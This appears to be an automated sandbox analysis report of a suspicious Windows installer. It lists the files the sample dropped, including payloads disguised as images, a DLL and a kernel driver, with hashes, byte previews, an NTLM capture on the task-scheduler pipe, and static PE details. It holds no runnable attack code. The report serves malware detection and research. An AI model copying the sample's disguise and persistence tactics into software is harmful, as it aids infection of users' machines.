Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\WchJz1.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711680162439479
Encrypted:	false
SSDEEP:	384:9OegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQS:15F1FUdy422IK+gAZt2i0YPpQn4GMF
MD5:	4AD2ADEB8EB2520783A2B4915B7578A0
SHA1:	E244B355D1F168371E6FED6C3A96F89F9829F2EB
SHA-256:	2DB2B6AFFFBC5A7D5248A5A7E6F28780DBBEFBF806C8DD3A0B12D42717BCA8CA
SHA-512:	9675C280F650B6312EB76912CD5E8970BE9B69EB4FECFB2309FA00B6A074C6C02CA04AB721E89BD765D574AA193D1223FFF8F796929F6F1F6A7E34230F45CFAA
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb.Mcbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.999938755862842
Encrypted:	true
SSDEEP:	98304:SAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:xndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	E00FAAA59BCE0D98749BB1BEEBC90B36
SHA1:	FBFF8E184B12E8D0A070048B29CC11D336A6512D
SHA-256:	E6F88765D5DDE1F7A2ABAE43C8AA9D91EB877A5498A6104839F33F1352D2D081
SHA-512:	3CC43755FCC3CCA86B1382EE8E84F67930F31CC5F0D3AB06D767CB72107B7A8A1D4DD525299268FA34765205E373CA6215DCC5FB968416004668A31A09D21482
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Qm.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WchJz1.exe

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978971345776604
Encrypted:	false
SSDEEP:	192:eBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:eBuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	28C7C3C066DC2BE9BF22201DA53313BD
SHA1:	A00945239952188A89C09458F973141AD1E302C2
SHA-256:	2007954F3ED056C0838F3AF71A87A491B42FE6CF05A21FB7F3F1CC48CA05BB3A
SHA-512:	BBB681FCC2F515D32EC9285EEBD1E8869C55073A15C0CDB16F70870AB11DB98730CE21FDD20CC63CA902B0056A314EA0F67BB57DEB34797CEDDF28D6495B12E6
Malicious:	false
Preview:	GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.002067590074405
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FR:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gR
MD5:	BA31F2A1AE3CDD2F32ACEBC513167E81
SHA1:	00FC24879E548A0B347A62BCA0004673BB4641C7
SHA-256:	0A00F4E868545ADBACDD1BCAED401A28B26135946D7E327BC32ED594C3A595AB
SHA-512:	0D1DE3BED9B4B2E8FE0A368DC2FE59FB9328D3B6AF22BF8909CA2AD675535BCD4215F487C653BC9A4BD3A99DC9B65CCBAF3797355250FE337F2787D0FB69D43E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.229217489330373
Encrypted:	false
SSDEEP:	384:c3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/5:cOUkgfdZ9pRyv+uPzCMHo3q4tDghD
MD5:	831CD346D7E48DD112157659F2261C9F
SHA1:	65AAD71435DD924E71C7E4B0B516A94CC4BB607C
SHA-256:	AF2E3BE404F4CE148C082ECE74BD1ABDF08F28965D0276BAAC078794D0A1D3D4
SHA-512:	6B80D55844557BFAC2176ED08755AE11CD9E851FEE438FB0CC638F46714E673FA9727A2083BA6711C7064D580D468924974E7B1FD02D1ED5534D9DBB3798E35C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................/..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\mm3ujg\mm3ujg.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	297
Entropy (8bit):	4.440447150815598
Encrypted:	false
SSDEEP:	3:ri9K0/ldl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl8/lP92lU8IAuUWKznlW:ri9TDTwPYtyjtOsNaG4oigtjrE
MD5:	4B81423F23C1E867AE569A1E6A00970E
SHA1:	702AB18DB0EBA05BBF15480FFBA9270F814BE306
SHA-256:	104E5DA57A64A0B534458238B7AC1CE95FAC137379AA0B422F4C319B42EC56B4
SHA-512:	EA119B09446E4FE2950AC6682C47D01A1232F0EE89E32E9759EDF087C013D03729AB65E16811A0461AA5985CA0CB02B59F1DC575BFEED2E974D75E68241F0009
Malicious:	false
Preview:	..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....%.\..c...J.."z)

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.622765294603118
TrID:	Win64 Executable GUI (202006/5) 77.37% InstallShield setup (43055/19) 16.49% Win64 Executable (generic) (12005/4) 4.60% Generic Win/DOS Executable (2004/3) 0.77% DOS Executable Generic (2002/1) 0.77%
File name:	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
File size:	210'432 bytes
MD5:	1268f9114ca93e5356a1c1ed706336c6
SHA1:	42daffd4e0dc4ea28dca0aab116daa76c601c78b
SHA256:	24f9d0446b2928fb060948bd1f9ec66ca963cf63ceea5f6817370c920158f610
SHA512:	b43d18ef2db665dd404a9f460471f6bdbf9fe850c570c9a69cbb83b0f515bc390785b2e2fc35f2f79f4bf5b964b36539be7b7c1b9bd29b1c2a39c15ec8d8c063
SSDEEP:	3072:SjzdRgTmCxjQQD+uxWFQTfmGXdA9MG8cx8pmzrgGtjTj+E9M/nk8gILhCTUlfk7:SjHgJxj5NxWFQTLXdAAIzrjuNCTU1
TLSH:	09249D5A7395C0F9C4178039CE8246A6E3B2B8625B71538F1764B71EEF37391AD3A311
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............\...\...\..Q\...\..V\...\..@\...\..F\...\...\{..\.._\...\..A\...\..D\...\Rich...\........................PE..d.....$g...

File Icon


Icon Hash:	2d16c7896d6d3dbd

Static PE Info

General

Entrypoint:	0x140005ecc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6724AF10 [Fri Nov 1 10:36:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	57a2a1fbe4c9442a92953e387ba7a5d0

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FDE24C74BE4h
dec eax
add esp, 28h
jmp 00007FDE24C6DDB6h
int3
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
cmp ecx, dword ptr [00014339h]
jne 00007FDE24C72C23h
dec eax
rol ecx, 10h
test cx, FFFFh
jne 00007FDE24C72C14h
rep ret
dec eax
ror ecx, 10h
jmp 00007FDE24C74C5Eh
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], esi
push edi
dec eax
sub esp, 60h
dec eax
mov ebp, ecx
dec eax
mov ecx, edx
dec ecx
mov esi, ecx
dec ecx
mov edi, eax
dec eax
mov ebx, edx
call 00007FDE24C75009h
dec eax
test ebx, ebx
jne 00007FDE24C72C37h
call 00007FDE24C74F77h
dec eax
and dword ptr [esp+20h], 00000000h
inc ebp
xor ecx, ecx
inc ebp
xor eax, eax
xor edx, edx
xor ecx, ecx
mov dword ptr [eax], 00000016h
call 00007FDE24C74E8Ch
or eax, FFFFFFFFh
jmp 00007FDE24C72C56h
dec eax
test edi, edi
je 00007FDE24C72BE8h
mov dword ptr [esp+48h], 00000049h
dec eax
mov dword ptr [esp+40h], ebx
dec eax
mov dword ptr [esp+30h], ebx
dec eax
cmp eax, 3FFFFFFFh
jbe 00007FDE24C72C1Ch
mov dword ptr [esp+38h], 7FFFFFFFh
jmp 00007FDE24C72C18h
add eax, eax
mov dword ptr [esp+38h], eax
dec esp
mov ecx, dword ptr [eax+eax+00000000h]

Rich Headers

Programming Language:

[C++] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[ASM] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x193ac	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2b000	0xc458	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x2a000	0xf00	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x38000	0x26c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x153a0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x328	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1369a	0x13800	de28247e56a67cb90fa14b418d855375	False	0.5506685697115384	data	6.354582843107026	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
